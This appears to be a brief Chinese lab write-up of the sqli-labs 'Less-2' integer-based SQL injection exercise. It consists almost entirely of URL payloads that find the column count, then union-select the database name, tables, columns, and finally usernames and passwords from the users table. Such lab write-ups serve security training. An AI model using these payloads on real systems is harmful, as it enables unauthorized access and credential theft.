总目录:戳一戳
Less-2 GET - Error based - Intiger based
整型注入是不需要进行单引号闭合的
- 基本和less-1一样,就是去掉了单引号
- 爆字段:?id=1 order by 3%23
- 爆字段位置
?id=0 union select 1,2,3%23 - 爆库
?id=0 union select 1,2,database()%23得到库名:security - 爆表
?id=0 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23,题目要求id,应该是users,用户数据表 - 爆列
?id=0 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' %23 - 爆数据
?id=0 union select 1,2,group_concat(username,0x3a,password) from users%23